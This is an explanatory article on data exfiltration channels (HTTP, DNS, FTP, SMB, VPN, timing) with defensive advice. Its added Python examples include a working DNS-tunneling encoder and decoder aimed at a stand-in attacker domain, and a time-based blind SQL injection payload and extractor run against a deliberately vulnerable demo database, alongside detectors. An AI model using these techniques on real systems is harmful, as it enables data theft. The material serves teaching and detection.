Data exfiltration, also known as data extrusion or data theft, is the unauthorized transfer of data out of a system or network. It can be carried out manually by insiders or automatically by malware. Data exfiltration is one of the most serious security threats because it targets valuable and often confidential information such as customer and financial data. A successful attack can result in enormous financial losses as well as significant damage to the reputation of a company or government agency.
Types of Data Exfiltration
- Manual Data Exfiltration: This often occurs through insiders who copy data out via email, portable media such as USB sticks, or uploads to external cloud services. External attackers can also exfiltrate manually once they have exploited a vulnerability, using whatever outbound channel the environment permits.
- Automated Data Exfiltration: Here, malware collects sensitive data continuously and sends it to an external server controlled by the attacker.
How does Data Exfiltration occur?
Data exfiltration can be accomplished through various techniques, including the misuse of ordinary network protocols such as HTTP and DNS as carriers, and through timing (side) channels. These methods abuse what the network already allows outbound, so the transfer blends in with legitimate traffic and goes unnoticed. Exfiltration is usually the last stage of an intrusion: it typically begins with social engineering or with the exploitation of a vulnerability that gives the attacker a foothold.
Exfiltration via HTTP/HTTPS
- Hidden Data Transfer: Attackers disguise stolen data as ordinary HTTP traffic so that it passes firewalls and proxies. One example is steganography: sensitive data is embedded in image files that are then uploaded to a web service. In the logs, this looks like a user uploading pictures to a website.
- Use of Open HTTP Connections: Where outbound plaintext HTTP is permitted and not inspected, data can be sent in many small requests that stay below volume thresholds and are easily overlooked.
- Use of Trusted Connections: Many firewalls restrict outbound HTTP(S) heavily, but connections to cloud providers, especially AWS or Google, are commonly exempted. Attackers therefore upload to storage in those clouds (for example an attacker-owned bucket or account), so the traffic goes to a trusted destination and an allowlist alone does not stop it.
- Use of POST: Instead of transmitting data in the URL or path, attackers can carry it in the body of POST requests. Proxies and firewalls usually log the URL but not the request body, so the data itself leaves no trace in the logs. In poorly protected environments without DLP, this is often the attacker's first choice; what a defender still sees is the request count and the outbound byte volume per destination.
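The HTTP techniques above all leave the same footprint in an egress proxy: bodies are not logged, but bytes and request counts per source and destination are. As an added example (not code from the original page), the following detector runs over constructed proxy log lines and flags both a large upload to an allowed cloud host and a "low and slow" stream of small POSTs. The log format, hostnames, IP addresses and thresholds are assumptions made for the demo.

```python
import re
from collections import defaultdict

# Constructed egress-proxy log lines (not from a real system). Assumed field order:
# timestamp src_ip method host path request_bytes status
LOG_LINES = [
    "2024-05-01T09:00:01Z 10.0.0.12 GET www.example.com /index.html 412 200",
    "2024-05-01T09:00:05Z 10.0.0.12 POST files.example-cloud.net /upload 5242880 200",
    "2024-05-01T09:00:09Z 10.0.0.12 POST files.example-cloud.net /upload 5242880 200",
    "2024-05-01T09:00:14Z 10.0.0.12 POST files.example-cloud.net /upload 5242880 200",
    "2024-05-01T09:01:00Z 10.0.0.15 POST crm.example.com /api/notes 2048 201",
    "2024-05-01T09:01:30Z 10.0.0.15 POST crm.example.com /api/notes 1980 201",
]
# Low and slow: 120 small POSTs from one client to one destination over two minutes.
LOG_LINES += [
    f"2024-05-01T09:{2 + i // 60:02d}:{i % 60:02d}Z 10.0.0.20 POST telemetry.example.org /beacon 900 204"
    for i in range(120)
]

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(\d+)$")


def parse(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, method, host, path, nbytes, status = m.groups()
    return {"ts": ts, "src": src, "method": method, "host": host,
            "path": path, "bytes": int(nbytes), "status": int(status)}


def upload_profile(lines):
    """Per (src, host): total request bytes and request count for body-carrying methods.
    The body content is never available here; only its size is."""
    profile = defaultdict(lambda: {"bytes": 0, "requests": 0})
    for line in lines:
        rec = parse(line)
        if rec is None or rec["method"] not in ("POST", "PUT"):
            continue
        entry = profile[(rec["src"], rec["host"])]
        entry["bytes"] += rec["bytes"]
        entry["requests"] += 1
    return dict(profile)


def flag_uploads(lines, max_bytes=10 * 1024 * 1024, max_requests=100):
    """Flag (src, host) pairs that exceed either a volume threshold or a request-count
    threshold. Trusted cloud hosts are deliberately not exempted: the volume check is
    what catches abuse of an allowlisted provider."""
    alerts = []
    for (src, host), entry in sorted(upload_profile(lines).items()):
        reasons = []
        if entry["bytes"] > max_bytes:
            reasons.append(f"volume {entry['bytes']} B")
        if entry["requests"] > max_requests:
            reasons.append(f"{entry['requests']} small uploads")
        if reasons:
            alerts.append((src, host, "; ".join(reasons)))
    return alerts


if __name__ == "__main__":
    for src, host, why in flag_uploads(LOG_LINES):
        print(f"{src} -> {host}: {why}")
```

The thresholds are placeholders; in practice they are set per host class from a baseline of normal upload volume, and the window (here the whole sample) is a sliding interval. Note that the 15 MB upload to the cloud host is flagged even though the host is trusted, while the CRM traffic from 10.0.0.15 is not.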
Exfiltration via DNS
- DNS Tunneling: Attackers use the DNS protocol itself as a tunnel. Data is encoded into the labels of queries for a domain whose authoritative name server they control, so the victim network's own resolver forwards the data to them. While HTTP and other protocols are blocked by firewalls, DNS is relatively rarely blocked, at least via the internal resolver.
- Low-throughput DNS Exfiltration: By sending small amounts of data slowly and continuously in DNS queries, the attack stays below volume-based thresholds and often remains undetected for a long time. Unusually long or high-entropy labels and a large number of unique subdomains under one domain are the typical indicators.
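To make both DNS bullets concrete, here is an added example (not code from the original page) showing the encoder an exfiltration tool would use to turn a payload into query names, the decoder run on the attacker's authoritative server, and the resolver-log heuristic a defender uses to spot it: many unique subdomains with long, high-entropy labels under one domain. The domain exfil.example.net, the sample payload, the benign query names and the thresholds are all constructed for the demo.

```python
import base64
import math
from collections import Counter, defaultdict

# Assumption: the attacker controls the authoritative name server for this zone.
ATTACKER_DOMAIN = "exfil.example.net"

# Constructed sample payload, not real data.
SAMPLE_DATA = (b"Q3 forecast: revenue 12.3M EUR, EBITDA margin 8.1%, headcount 412.\n"
               b"Attachment: board_deck_v3.pdf, confidential.\n")

# Constructed benign resolver traffic for comparison.
BENIGN_QUERIES = ["www.example.com", "mail.example.com", "api.example.com", "cdn.example.com",
                  "www.example.com", "a1b2c3d4e5f6a7b8c9d0e1f2.cdn-cache.example.org"]


def encode_for_dns(data, domain, chunk_bytes=30):
    """Split data into 30-byte chunks. Unpadded lower-case base32 keeps each label inside
    the 63-character limit and the DNS-safe alphabet (30 bytes -> 48 characters). A leading
    sequence label lets the receiver reassemble chunks that arrive out of order."""
    names = []
    for seq, i in enumerate(range(0, len(data), chunk_bytes)):
        label = base64.b32encode(data[i:i + chunk_bytes]).decode().rstrip("=").lower()
        names.append(f"{seq}.{label}.{domain}")
    return names


def decode_from_dns(names, domain):
    """What the attacker's authoritative server does with the query names it receives."""
    chunks = []
    for name in names:
        seq, label = name[: -len(domain) - 1].split(".")
        pad = "=" * (-len(label) % 8)          # restore the base32 padding stripped above
        chunks.append((int(seq), base64.b32decode(label.upper() + pad)))
    return b"".join(chunk for _, chunk in sorted(chunks))


def shannon_entropy(text):
    """Bits per character; 'www' is 0, encoded payload is typically above 3."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(name):
    """Simplification: the last two labels. A real detector would use the public suffix list."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def suspicious_domains(queries, min_unique=3, min_mean_label=20, min_entropy=3.0):
    """Flag registrable domains whose subdomains look like encoded payload. All three
    conditions must hold at once so that a CDN with a few long cache keys is not flagged."""
    by_domain = defaultdict(set)
    for q in queries:
        by_domain[registered_domain(q)].add(q.rstrip("."))
    flagged = []
    for domain, names in by_domain.items():
        subs = [n[: -len(domain) - 1] for n in names if n != domain]
        if len(subs) < min_unique:
            continue
        mean_label = sum(max(len(lbl) for lbl in s.split(".")) for s in subs) / len(subs)
        entropy = shannon_entropy("".join(subs).replace(".", ""))
        if mean_label >= min_mean_label and entropy >= min_entropy:
            flagged.append(domain)
    return sorted(flagged)


SAMPLE_QUERIES = BENIGN_QUERIES + encode_for_dns(SAMPLE_DATA, ATTACKER_DOMAIN)

if __name__ == "__main__":
    for name in encode_for_dns(SAMPLE_DATA, ATTACKER_DOMAIN):
        print(name)
    print("flagged:", suspicious_domains(SAMPLE_QUERIES))
```

The detector groups by registrable domain, so the tunnel under exfil.example.net is reported as example.net. Real tools spread the queries over time and across record types (TXT, CNAME, MX) and use the response to carry commands back, which is why per-domain counts over a long window matter more than any single query.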
Exfiltration via FTP/FTPS
- FTP Transfer: Before resorting to more complex methods like DNS, attackers often test whether outbound FTP or FTPS is available. This simple protocol allows large amounts of data to be copied to an external server with standard tools, and plain FTP additionally sends credentials and contents unencrypted.
Exfiltration via SMB
- Server Message Block: SMB is built for copying files between hosts and is therefore equally suited to pushing data from Server A to Server B, including to an attacker-controlled host on the internet. Outbound SMB (TCP 445) should be blocked at the perimeter and monitored internally.
Exfiltration Using VPNs
- Encrypted Connections: VPN connections are strongly encrypted, so data sent through an attacker-established VPN tunnel is hidden from network inspection and hard to analyze. This works in the attacker's favour precisely where DLP solutions are deployed, since the DLP sees only encrypted packets. Outbound VPN protocols to unapproved endpoints should therefore be blocked.
Blind Extraction via sleep() (or comparable functions)
- Timings: If you can inject code or queries into an application but never see their result (blind injection, common in web applications), and neither HTTP nor DNS is available as an out-of-band channel, you can still extract data through timing. The injected code is made to take a long time when a condition is true, for example when the first character of the secret is "a", and to return immediately otherwise; the response time then answers one yes/no question per request. Extracting a whole value this way is slow and laborious, but it is possible, and a binary search over the character range reduces it to a handful of requests per character.
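As an added example (not code from the original page), the following is a self-contained simulation of time-based blind extraction against a deliberately vulnerable SQL lookup. SQLite is used so that it runs offline; since SQLite has no built-in sleep(), the block registers one that behaves like MySQL's SLEEP(), PostgreSQL's pg_sleep() or SQL Server's WAITFOR DELAY. The users table, the secret 's3cr' and the 0.05-second delay are constructed for the demo.

```python
import sqlite3
import time

DELAY = 0.05  # seconds the injected sleep() lasts; kept small so the demo finishes quickly


def build_db(secret):
    """Constructed demo database with one user whose api_key is the value we will extract."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no sleep(); register one to mimic MySQL SLEEP() / pg_sleep() / WAITFOR DELAY.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (name TEXT, api_key TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', ?)", (secret,))
    return conn


def vulnerable_lookup(conn, username):
    """Deliberately vulnerable: the username is concatenated into the SQL string.
    The query result is discarded, so the caller learns nothing except how long it took."""
    conn.execute(f"SELECT name FROM users WHERE name = '{username}'").fetchall()


def condition_holds(conn, condition):
    """Ask one yes/no question: the payload sleeps only when the condition is true."""
    payload = f"alice' AND (CASE WHEN {condition} THEN sleep({DELAY}) ELSE 0 END) = 0 -- "
    start = time.monotonic()
    vulnerable_lookup(conn, payload)
    return time.monotonic() - start >= DELAY * 0.8  # margin against timer jitter


def binary_search(conn, expr, lo, hi):
    """Return the value of the SQL expression expr, assuming it lies in [lo, hi],
    using about log2(hi - lo) timed requests instead of one per candidate value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if condition_holds(conn, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret(conn, max_len=64):
    """Recover alice's api_key character by character via timing alone."""
    length = binary_search(conn, "length(api_key)", 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # printable ASCII range 32..126; unicode() and substr() are SQLite core functions
        code = binary_search(conn, f"unicode(substr(api_key, {pos}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = build_db("s3cr")
    print("extracted:", extract_secret(db))
```

Each request answers one comparison, so the binary search needs about seven requests per character instead of up to 95 with a linear scan. Against a real target the delay must be set well above network jitter and the threshold tuned accordingly, and the same trick works with any injectable language that offers a sleep or a sufficiently heavy computation.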
Attackers usually find a usable channel in the end. Some of the most important protocols were covered here, but there are many more possibilities: SSH, ICMP and SMTP are the best-known ones.
How can Data Exfiltration be prevented?
To effectively prevent data exfiltration, companies rely on a combination of technical measures and employee training. Since a large share of exfiltrations starts with human error or a phishing attack, employee training is a crucial protection mechanism. In addition, technologies such as Data Loss Prevention (DLP) and Identity and Access Management (IAM) play a central role in protecting sensitive data.
Protection Measures
- Data Loss Prevention (DLP): DLP solutions inspect data in transit and block sensitive data from leaving the network without authorization. They are only effective where the traffic can actually be inspected, which is why unapproved encrypted tunnels have to be blocked separately.
- Identity and Access Management (IAM): With IAM systems, access to sensitive data is strictly controlled so that only authorized persons can view or transfer it; least privilege also limits how much a compromised account can reach.